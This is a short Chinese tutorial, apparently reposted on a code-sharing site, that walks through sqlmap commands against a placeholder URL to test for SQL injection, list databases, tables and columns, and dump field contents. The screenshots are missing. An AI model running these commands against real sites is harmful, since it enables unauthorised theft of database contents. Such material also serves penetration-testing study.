首页 > 代码库 > 用SQLMAP工具进行SQL注入

用SQLMAP工具进行SQL注入

2024-11-17 08:27:02   203人阅读

 

1.检查注入点

【注入点需要自己寻找,可以利用一些工具,例如:Acunetix Web Vulnerability

scanner WVS),AppScan等】u表示URL

sqlmap   - u   http://www.XXXXX.com/a.asp?p=18

技术分享

2.列出数据库信息

sqlmap会帮助我们列出所有的名称,包括数据库类型】

Sqlmap   -u   www.XXXXX.com/a.asp?p=18   --dbs

 技术分享

3.指定数据库名列出所有表

sqlmap   -u   www.XXXXX.com/a.asp?p=18  -D  数据库名 --tables

技术分享

 

结果:

技术分享

4.列举指定数据库指定表的所有字段

sqlmap   -u   www.XXXXX.com/a.asp?p=18 -D 数据名 -T  表名称 --columns

 技术分享

5.输出指定字段的内容

sqlmap   -u   www.XXXXX.com/a.asp?p=18 -D 数据名 -T  表名称 -C 字段1,字段2   --dump(根据自己的需要,将一些字段输出)

技术分享

 

结果:

技术分享

---恢复内容结束---

用SQLMAP工具进行SQL注入


联系
我们